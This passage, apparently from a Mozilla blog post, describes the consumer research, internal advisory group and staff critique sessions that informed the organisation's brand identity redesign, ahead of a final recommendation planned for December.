So we recruited participants in the US, Brazil, Germany and India between the ages of 18 and 40, who represent our consumer target audience: people who make decisions about the companies they support based on their personal values and ideals, which are driven by bettering their communities and themselves. 157 people participated (an average of about 39 from each country), with a split of 49% men and 51% women. 69% were between 18 and 34 years old, and 90% had some existing awareness of Mozilla.

For 2 days, they interacted with an online moderator and had the opportunity to see and respond to others’ opinions in real time.

Learnings from this qualitative research are not intended to provide statistical analysis on which identity system was “the winner.”  Instead respondents talk about what they’re seeing, while the moderator uncovers trends within these comments, and dives deeper into areas that are either highly favorable or unfavorable by asking “why?”  This type of research is particularly valuable at our stage of an identity design process – where we’ve identified the strategic idea, and are figuring out the best way to bring it to life. Consumers not intimately familiar with Mozilla view the brand identity system with fresh eyes, helping illuminate any blind spots and provide insights into what helps new audiences better understand us.

Tapping into internal experts

Another extremely important set of stakeholders who have provided insights throughout the entire project, and especially at this stage, is our brand advisory group, composed of technologists, designers, strategists and community representatives from throughout Mozilla. This team was responsible not only for representing their “functional” area, but also accountable for representing the community of Mozillians across the world. We met every two weeks, sharing work-in-progress and openly and honestly discussing the merits and misses of each design iteration.

In addition to regular working sessions, we also asked our brand advisory group members to represent the work with their own networks, field questions, and surface concerns. At one point, one of our technology representatives called out that several developers and engineers did not understand the strategic intent and approach to the project, and needed a better framework by which to evaluate the work in progress. So we convened this group for a frank and freewheeling conversation, and everyone — the design team included — walked away with a much deeper appreciation for the opportunities and challenges.

That exchange inspired us to host a series of “brown bag” conversations, open to all staff and volunteer Mozillians.  During one week in October, we hosted five 60-minute sessions, as early as 7am PT and as late as 8pm PT to accommodate global time zones and participants. We also videotaped one session and made that available on AirMozilla, our video network, for those unable to attend in person. Throughout those 5 days, over 150 people participated in those critique sessions, which proved to be rich with constructive ideas.

The important thing to note is that these “brown bag” sessions were not driving toward consensus, but instead invited critical examination and discussion of the work based on a very explicit set of criteria. Similar to the qualitative research conducted with our target consumer audience, these discussions allowed us to ask “why” and “why not” and truly understand emotional reactions in a way that quantitative surveys aren’t able to do.

The participation and contribution of our brand advisory group has been invaluable. They’ve been tough critics, wise counsel, patient sounding boards, trusted eyes and ears and ultimately, strategic partners in guiding the brand identity work. They’re helping us deliver a solution that has global appeal, is technically beautiful, breaks through the clutter and noise, scales across all of our products, technologies, programs, and communities, and is fit for the future.  Most importantly, they have been an important barometer in designing a system that is both true to who we are and pushes us to where we want to go.

Closing in on a recommendation

The feedback from the qualitative consumer research indicates that the new brand identity reinforces the majority of the key attributes we want Mozilla to represent. Along with insights from our brand advisory group and leadership, this feedback helps direct our work as we move to a final recommendation and find the right balance between bold and welcoming. Our goal is to share an update at our All Hands meeting in early December, almost exactly six months from the date we first shared options for strategic narratives to kick off the work. Following that, we’ll post it here as well.
